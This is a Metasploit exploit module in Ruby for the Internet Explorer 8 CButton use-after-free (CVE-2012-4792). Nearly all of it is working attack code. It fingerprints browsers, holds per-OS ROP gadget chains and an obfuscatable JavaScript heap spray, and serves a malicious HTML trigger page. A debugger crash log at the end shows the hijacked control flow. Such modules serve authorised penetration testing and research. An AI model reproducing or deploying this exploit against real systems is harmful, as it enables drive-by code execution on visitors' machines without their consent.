##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "8.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => GoodRanking
	})

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
			'Description'    => %q{
					This module exploits a vulnerability found in Microsoft Internet Explorer. A
				use-after-free condition occurs when a CButton object is freed, but a reference
				is kept and used again during a page reload, an invalid memory that's controllable
				is used, and allows arbitrary code execution under the context of the user.

					Please note: This vulnerability has been exploited in the wild targeting
				mainly China/Taiwan/and US-based computers.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'eromang',
					'mahmud ab rahman',
					'juan vazquez',      #Metasploit
					'sinn3r',            #Metasploit
					'Peter Vreugdenhil'  #New trigger & new exploit technique
				],
			'References'     =>
				[
					[ 'CVE', '2012-4792' ],
					[ 'US-CERT-VU', '154201' ],
					[ 'BID', '57070' ],
					[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
					[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
					[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
					[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
					[ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ],
					[ 'URL', 'http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/' ],
					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012' ]
				],
			'Payload'        =>
				{
					'BadChars'       => "\x00",
					'Space'          => 1024,
					'DisableNops'    => true
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 8 on Windows XP SP3',       { 'Rop' => :msvcrt } ],
					[ 'IE 8 on Windows Vista',        { 'Rop' => :jre    } ],
					[ 'IE 8 on Windows Server 2003',  { 'Rop' => :msvcrt } ],
					[ 'IE 8 on Windows 7',            { 'Rop' => :jre    } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 27 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)

	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

		ie_name = "IE #{ie}"

		case nt
		when '5.1'
			os_name = 'Windows XP SP3'
		when '5.2'
			os_name = 'Windows Server 2003'
		when '6.0'
			os_name = 'Windows Vista'
		when '6.1'
			os_name = 'Windows 7'
		else
			# OS not supported
			return nil
		end

		targets.each do |t|
			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
				print_status("Target selected as: #{t.name}")
				return t
			end
		end

		return nil
	end

	def ie8_smil(my_target, p)

		case my_target['Rop']
		when :msvcrt
			case my_target.name
			when 'IE 8 on Windows XP SP3'
				align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
				xchg_esp  = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
			when 'IE 8 on Windows Server 2003'
				align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
				xchg_esp  = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
			end
		else
			align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
			xchg_esp  = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
		end

		padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
		js_payload = Rex::Text.to_unescape(p)

		js = %Q|
		unicorn = unescape("#{padding}");
		for (i=0; i < 3; i++) {
			unicorn += unescape("#{padding}");
		}

		unicorn += unescape("#{js_payload}");

		animvalues = unescape("#{align_esp}");

		for (i=0; i < 0xDC/4; i++) {
			if (i == 0xDC/4-1) {
				animvalues += unescape("#{xchg_esp}");
			}
			else {
				animvalues += unescape("#{align_esp}");
			}
		}

		animvalues += unicorn;

		for(i = 0; i < 21; i++) {
			animvalues += ";cyan";
		}
		|

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		return js
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V")[0].to_i
	end

	def nop
		return make_nops(4).unpack("V")[0].to_i
	end

	def get_payload(t, cli)
		code = payload.encoded

		# No rop. Just return the payload.
		return code if t['Rop'].nil?

		case t['Rop']
		when :msvcrt
			case t.name
			when 'IE 8 on Windows XP SP3'
				rop_gadgets =
				[
					0x77c1e844, # POP EBP # RETN [msvcrt.dll]
					0x77c1e844, # skip 4 bytes [msvcrt.dll]
					0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
					0xffffffff,
					0x77c127e5, # INC EBX # RETN [msvcrt.dll]
					0x77c127e5, # INC EBX # RETN [msvcrt.dll]
					0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
					0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
					0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
					0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
					0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
					0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
					0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
					0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
					0x77c3048a, # POP EDI # RETN [msvcrt.dll]
					0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
					0x77c46efb, # POP ESI # RETN [msvcrt.dll]
					0x77c2aacc, # JMP [EAX] [msvcrt.dll]
					0x77c3b860, # POP EAX # RETN [msvcrt.dll]
					0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
					0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
					0x77c35459  # ptr to 'push esp #  ret ' [msvcrt.dll]
				].pack("V*")
			when 'IE 8 on Windows Server 2003'
				rop_gadgets =
				[
					0x77bb2563, # POP EAX # RETN
					0x77ba1114, # <- *&VirtualProtect()
					0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
					junk,
					0x77bb0c86, # XCHG EAX,ESI # RETN
					0x77bc9801, # POP EBP # RETN
					0x77be2265, # ptr to 'push esp #  ret'
					0x77bb2563, # POP EAX # RETN
					0x03C0990F,
					0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
					0x77bb48d3, # POP EBX, RET
					0x77bf21e0, # .data
					0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
					0x77bbfc02, # POP ECX # RETN
					0x77bef001, # W pointer (lpOldProtect) (-> ecx)
					0x77bd8c04, # POP EDI # RETN
					0x77bd8c05, # ROP NOP (-> edi)
					0x77bb2563, # POP EAX # RETN
					0x03c0984f,
					0x77bdd441, # SUB EAX, 03c0940f
					0x77bb8285, # XCHG EAX,EDX # RETN
					0x77bb2563, # POP EAX # RETN
					nop,
					0x77be6591  # PUSHAD # ADD AL,0EF # RETN
				].pack("V*")
			end
		else
			rop_gadgets =
			[
				0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
				0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
				0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
				0x7c3415a2, # JMP [EAX] [msvcr71.dll]
				0xffffffff,
				0x7c376402, # skip 4 bytes [msvcr71.dll]
				0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
				0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
				0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
				0x7c344f87, # POP EDX # RETN [msvcr71.dll]
				0xffffffc0, # Value to negate, will become 0x00000040
				0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
				0x7c34d201, # POP ECX # RETN [msvcr71.dll]
				0x7c38b001, # &Writable location [msvcr71.dll]
				0x7c347f97, # POP EAX # RETN [msvcr71.dll]
				0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
				0x7c345c30  # ptr to 'push esp #  ret ' [msvcr71.dll]
				# rop chain generated with mona.py
			].pack("V*")
		end

		rop_payload = rop_gadgets
		case t['Rop']
		when :msvcrt
			rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
		else
			rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
		end
		rop_payload << code
		rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt

		return rop_payload
	end

	def load_exploit_html(my_target, cli)

		p  = get_payload(my_target, cli)
		js = ie8_smil(my_target, p)

		html = %Q|
		<!doctype html>
		<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
		<head>
		<meta>
			<?IMPORT namespace="t" implementation="#default#time2">
		</meta>

		<script>
		function helloWorld()
		{
			e_form = document.getElementById("formelm");
			e_div = document.getElementById("divelm");

			#{js}

			for(i =0; i < 20; i++) {
				document.createElement('button');
			}
			e_div.appendChild(document.createElement('button'))
			e_div.firstChild.applyElement(e_form);

			e_div.innerHTML = ""
			e_div.appendChild(document.createElement('body'));

			CollectGarbage();

			try {
				a = document.getElementById('myanim');
				a.values = animvalues;
			}
			catch(e) {}
		}

		</script>
		</head>
		<body onload="eval(helloWorld())">
		<t:ANIMATECOLOR id="myanim"/>
		<div id="divelm"></div>
		<form id="formelm">
		</form>
		</body>
		</html>
		|

		return html
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		uri   = request.uri
		print_status("Requesting: #{uri}")

		my_target = get_target(agent)
		# Avoid the attack if no suitable target found
		if my_target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		html = load_exploit_html(my_target, cli)
		html = html.gsub(/^\t\t/, '')
		print_status("Sending HTML...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

end


=begin
(87c.f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
0:008> k
ChildEBP RetAddr
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
020bffec 00000000 kernel32!BaseThreadStart+0x37

0:008> r
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????
=end